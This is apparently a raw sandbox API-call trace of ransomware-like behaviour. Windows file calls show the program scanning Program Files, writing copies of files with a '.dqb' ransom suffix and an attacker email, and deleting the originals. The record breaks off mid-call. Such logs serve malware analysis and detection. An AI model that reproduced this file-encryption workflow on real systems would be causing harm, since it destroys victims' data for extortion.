[0272.182] lstrlenW (lpString=".1cd") returned 4 [0272.182] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.182] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 52 [0272.182] lstrlenW (lpString=".jpg") returned 4 [0272.182] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.182] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0272.183] lstrlenW (lpString="JSProfilerCore.dll") returned 18 [0272.183] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.183] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=132096) returned 1 [0272.183] CloseHandle (hObject=0x31c) returned 1 [0272.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll")) returned 0x20 [0272.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.183] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.184] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.184] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.184] lstrlenW (lpString=".doc") returned 4 [0272.184] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.184] lstrlenW (lpString=".docx") returned 5 [0272.184] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0272.184] lstrlenW (lpString=".pdf") returned 4 [0272.184] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.184] lstrlenW (lpString=".xls") returned 4 [0272.184] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.184] lstrlenW (lpString=".xlsx") returned 5 [0272.184] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0272.184] lstrlenW (lpString=".ppt") returned 4 [0272.184] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.184] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.184] lstrlenW (lpString=".zip") returned 4 [0272.184] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.184] lstrlenW (lpString=".rar") returned 4 [0272.184] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.184] lstrlenW (lpString=".bz2") returned 4 [0272.184] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.184] lstrlenW (lpString=".7z") returned 3 [0272.184] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.184] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.184] lstrlenW (lpString=".dbf") returned 4 [0272.184] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.184] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.184] lstrlenW (lpString=".1cd") returned 4 [0272.184] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.184] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.184] lstrlenW (lpString=".jpg") returned 4 [0272.184] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.185] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.185] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.185] lstrlenW (lpString=".doc") returned 4 [0272.185] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.185] lstrlenW (lpString=".docx") returned 5 [0272.185] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0272.185] lstrlenW (lpString=".pdf") returned 4 [0272.185] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.185] lstrlenW (lpString=".xls") returned 4 [0272.185] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.185] lstrlenW (lpString=".xlsx") returned 5 [0272.185] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0272.185] lstrlenW (lpString=".ppt") returned 4 [0272.185] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.185] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.185] lstrlenW (lpString=".zip") returned 4 [0272.185] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.185] lstrlenW (lpString=".rar") returned 4 [0272.185] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.185] lstrlenW (lpString=".bz2") returned 4 [0272.185] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.185] lstrlenW (lpString=".7z") returned 3 [0272.185] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.185] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.185] lstrlenW (lpString=".dbf") returned 4 [0272.185] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.185] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.185] lstrlenW (lpString=".1cd") returned 4 [0272.185] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.185] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 53 [0272.185] lstrlenW (lpString=".jpg") returned 4 [0272.185] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.186] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0272.186] lstrlenW (lpString="jsprofilerui.dll") returned 16 [0272.186] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.186] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=287744) returned 1 [0272.186] CloseHandle (hObject=0x31c) returned 1 [0272.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll")) returned 0x20 [0272.186] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.186] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.186] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.186] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.186] lstrlenW (lpString=".doc") returned 4 [0272.186] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.186] lstrlenW (lpString=".docx") returned 5 [0272.186] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0272.186] lstrlenW (lpString=".pdf") returned 4 [0272.186] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.186] lstrlenW (lpString=".xls") returned 4 [0272.186] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.186] lstrlenW (lpString=".xlsx") returned 5 [0272.186] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0272.186] lstrlenW (lpString=".ppt") returned 4 [0272.186] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.186] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.186] lstrlenW (lpString=".zip") returned 4 [0272.187] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.187] lstrlenW (lpString=".rar") returned 4 [0272.187] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.187] lstrlenW (lpString=".bz2") returned 4 [0272.187] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.187] lstrlenW (lpString=".7z") returned 3 [0272.187] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.187] lstrlenW (lpString=".dbf") returned 4 [0272.187] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.187] lstrlenW (lpString=".1cd") returned 4 [0272.187] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.187] lstrlenW (lpString=".jpg") returned 4 [0272.187] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.187] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.187] lstrlenW (lpString=".doc") returned 4 [0272.187] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.187] lstrlenW (lpString=".docx") returned 5 [0272.187] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0272.187] lstrlenW (lpString=".pdf") returned 4 [0272.187] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.187] lstrlenW (lpString=".xls") returned 4 [0272.187] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.187] lstrlenW (lpString=".xlsx") returned 5 [0272.187] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0272.187] lstrlenW (lpString=".ppt") returned 4 [0272.187] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.187] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.187] lstrlenW (lpString=".zip") returned 4 [0272.187] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.188] lstrlenW (lpString=".rar") returned 4 [0272.188] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.188] lstrlenW (lpString=".bz2") returned 4 [0272.188] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.188] lstrlenW (lpString=".7z") returned 3 [0272.188] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.188] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.188] lstrlenW (lpString=".dbf") returned 4 [0272.188] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.188] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.188] lstrlenW (lpString=".1cd") returned 4 [0272.188] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.188] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 51 [0272.188] lstrlenW (lpString=".jpg") returned 4 [0272.188] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.188] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0272.188] lstrlenW (lpString="msdbg2.dll") returned 10 [0272.188] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.188] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=358904) returned 1 [0272.188] CloseHandle (hObject=0x31c) returned 1 [0272.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll")) returned 0x20 [0272.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\msdbg2.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.189] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.189] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned 45 [0272.189] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned 45 [0272.189] lstrlenW (lpString=".doc") returned 4 [0272.189] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.189] lstrlenW (lpString=".docx") returned 5 [0272.189] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0272.189] lstrlenW (lpString=".pdf") returned 4 [0272.190] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.190] lstrlenW (lpString=".xls") returned 4 [0272.190] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.190] lstrlenW (lpString=".xlsx") returned 5 [0272.190] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0272.190] lstrlenW (lpString=".ppt") returned 4 [0272.190] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.190] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned 45 [0272.190] lstrlenW (lpString=".zip") returned 4 [0272.190] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.190] lstrlenW (lpString=".rar") returned 4 [0272.190] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.190] lstrlenW (lpString=".bz2") returned 4 [0272.190] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.190] lstrlenW (lpString=".7z") returned 3 [0272.190] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.190] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned 45 [0272.190] lstrlenW (lpString=".dbf") returned 4 [0272.190] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.193] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.213] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.214] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll"), lpNewFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\msolap100.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\msolap100.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.225] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.225] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0272.327] GetLastError () returned 0x0 [0272.327] ReadFile (in: hFile=0x31c, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0xa2b58, lpOverlapped=0x0) returned 1 [0272.384] WriteFile (in: hFile=0x324, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0xa2b60, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0xa2b60, lpOverlapped=0x0) returned 1 [0272.394] ReadFile (in: hFile=0x31c, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x0, lpOverlapped=0x0) returned 1 [0272.394] WriteFile (in: hFile=0x324, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0xea, lpOverlapped=0x0) returned 1 [0272.394] SetEndOfFile (hFile=0x324) returned 1 [0272.394] CloseHandle (hObject=0x324) returned 1 [0272.395] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0272.395] SetEndOfFile (hFile=0x31c) returned 1 [0272.496] CloseHandle (hObject=0x31c) returned 1 [0272.497] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0272.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll")) returned 1 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.497] lstrlenW (lpString=".doc") returned 4 [0272.497] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0272.497] lstrlenW (lpString=".docx") returned 5 [0272.497] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1 [0272.497] lstrlenW (lpString=".pdf") returned 4 [0272.497] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0272.497] lstrlenW (lpString=".xls") returned 4 [0272.497] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0272.497] lstrlenW (lpString=".xlsx") returned 5 [0272.497] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1 [0272.497] lstrlenW (lpString=".ppt") returned 4 [0272.497] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0272.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.497] lstrlenW (lpString=".zip") returned 4 [0272.497] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0272.497] lstrlenW (lpString=".rar") returned 4 [0272.498] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0272.498] lstrlenW (lpString=".bz2") returned 4 [0272.498] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0272.498] lstrlenW (lpString=".7z") returned 3 [0272.498] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.498] lstrlenW (lpString=".dbf") returned 4 [0272.498] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.498] lstrlenW (lpString=".1cd") returned 4 [0272.498] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.498] lstrlenW (lpString=".jpg") returned 4 [0272.498] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.498] lstrlenW (lpString=".doc") returned 4 [0272.498] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0272.498] lstrlenW (lpString=".docx") returned 5 [0272.498] lstrcmpiW (lpString1=".docx", lpString2="v.rll") returned -1 [0272.498] lstrlenW (lpString=".pdf") returned 4 [0272.498] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0272.498] lstrlenW (lpString=".xls") returned 4 [0272.498] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0272.498] lstrlenW (lpString=".xlsx") returned 5 [0272.498] lstrcmpiW (lpString1=".xlsx", lpString2="v.rll") returned -1 [0272.498] lstrlenW (lpString=".ppt") returned 4 [0272.498] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0272.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.498] lstrlenW (lpString=".zip") returned 4 [0272.498] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0272.498] lstrlenW (lpString=".rar") returned 4 [0272.498] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0272.499] lstrlenW (lpString=".bz2") returned 4 [0272.499] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0272.499] lstrlenW (lpString=".7z") returned 3 [0272.499] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0272.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.499] lstrlenW (lpString=".dbf") returned 4 [0272.499] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0272.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.499] lstrlenW (lpString=".1cd") returned 4 [0272.499] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0272.499] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll") returned 83 [0272.499] lstrlenW (lpString=".jpg") returned 4 [0272.499] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0272.499] Sleep (dwMilliseconds=0x64) [0272.613] Sleep (dwMilliseconds=0x64) [0272.862] Sleep (dwMilliseconds=0x64) [0273.015] Sleep (dwMilliseconds=0x64) [0273.235] Sleep (dwMilliseconds=0x64) [0273.363] Sleep (dwMilliseconds=0x64) [0273.479] Sleep (dwMilliseconds=0x64) [0273.607] Sleep (dwMilliseconds=0x64) [0273.722] Sleep (dwMilliseconds=0x64) [0273.843] Sleep (dwMilliseconds=0x64) [0273.978] Sleep (dwMilliseconds=0x64) [0274.216] Sleep (dwMilliseconds=0x64) [0274.326] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.326] lstrlenW (lpString="EAST_01.MID") returned 11 [0274.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.481] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x34cff1c | out: lpFileSize=0x34cff1c*=6165) returned 1 [0274.481] CloseHandle (hObject=0x31c) returned 1 [0274.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid")) returned 0x20 [0274.488] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.675] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.675] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34cfec8 | out: lpNewFilePointer=0x0) returned 1 [0274.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EAST_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\east_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.731] GetLastError () returned 0x0 [0274.731] ReadFile (in: hFile=0x324, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x1815, lpOverlapped=0x0) returned 1 [0274.733] WriteFile (in: hFile=0x328, lpBuffer=0x3f40020*, nNumberOfBytesToWrite=0x1820, lpNumberOfBytesWritten=0x34cfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesWritten=0x34cfc9c*=0x1820, lpOverlapped=0x0) returned 1 [0274.734] ReadFile (in: hFile=0x324, lpBuffer=0x3f40020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34cfed4, lpOverlapped=0x0 | out: lpBuffer=0x3f40020*, lpNumberOfBytesRead=0x34cfed4*=0x0, lpOverlapped=0x0) returned 1 [0274.734] WriteFile (in: hFile=0x328, 